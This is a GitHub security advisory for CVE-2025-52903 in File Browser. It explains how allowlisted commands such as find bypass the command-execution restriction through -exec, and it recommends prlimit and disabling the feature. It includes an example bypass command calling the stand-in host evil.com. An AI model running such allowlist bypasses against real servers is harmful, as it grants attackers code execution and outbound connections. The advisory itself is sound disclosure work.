Skip to content

filebrowser Allows Shell Commands to Spawn Other Commands

High severity GitHub Reviewed Published Jun 26, 2025 in filebrowser/filebrowser • Updated Aug 4, 2025

Package

gomod github.com/filebrowser/filebrowser (Go)

Affected versions

<= 1.11.0

Patched versions

None
gomod github.com/filebrowser/filebrowser/v2 (Go)
< 2.33.10
2.33.10

Description

Summary

The Command Execution feature of File Browser only allows the execution of shell command which have been predefined on a user-specific allowlist. Many tools allow the execution of arbitrary different commands, rendering this limitation void.

Impact

The concrete impact depends on the commands being granted to the attacker, but the large number of standard commands allowing the execution of subcommands makes it likely that every user having the Execute commands permissions can exploit this vulnerability. Everyone who can exploit it will have full code execution rights with the uid of the server process.

Vulnerability Description

Many Linux commands allow the execution of arbitrary different commands. For example, if a user is authorized to run only the find command and nothing else, this restriction can be circumvented by using the -exec flag.

Some common commands having the ability to launch external commands and which are included in the official container image of Filebrowser are listed below. The website https://gtfobins.github.io gives a comprehensive overview:

As a prerequisite, an attacker needs an account with the Execute Commands permission and some permitted commands.

Proof of Concept

The following screenshot demonstrates, how this can be used to issue a network call to an external server:

image

Recommended Countermeasures

Until this issue is fixed, we recommend to completely disable Execute commands for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration.

The prlimit command can be used to prevent the execution of subcommands:

$ find . -exec curl http://evil.com {} \;
<HTML>
<HEAD>
[...]

$ prlimit --nproc=0 find . -exec curl http://evil.com {} \;
find: cannot fork: Resource temporarily unavailable

It should be prepended to any command executed in the context of the application. prlimit can be used for containerized deployments as well as for bare-metal ones.

WARNING: Note that this does prevent any unexpected behavior from the authorized command. For example, the find command can also delete files directly via its -delete flag.

As a defense-in-depth measure, Filebrowser should provide an additional container image based on a distroless base image.

Timeline

  • 2025-03-26 Identified the vulnerability in version 2.32.0
  • 2025-06-25 Uploaded advisories to the project's GitHub repository
  • 2025-06-25 CVE ID assigned by GitHub
  • 2025-06-25 A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on filebrowser/filebrowser#5199.

References

Credits

References

@hacdias hacdias published to filebrowser/filebrowser Jun 26, 2025
Published by the National Vulnerability Database Jun 26, 2025
Published to the GitHub Advisory Database Jun 27, 2025
Reviewed Jun 27, 2025
Last updated Aug 4, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(35th percentile)

Weaknesses

Improper Neutralization of Special Elements used in a Command ('Command Injection')

The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Learn more on MITRE.

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

The product constructs a string for a command to executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string. Learn more on MITRE.

Permissive List of Allowed Inputs

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses. Learn more on MITRE.

Exposed Dangerous Method or Function

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted. Learn more on MITRE.

CVE ID

CVE-2025-52903

GHSA ID

GHSA-3q2w-42mv-cph4

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.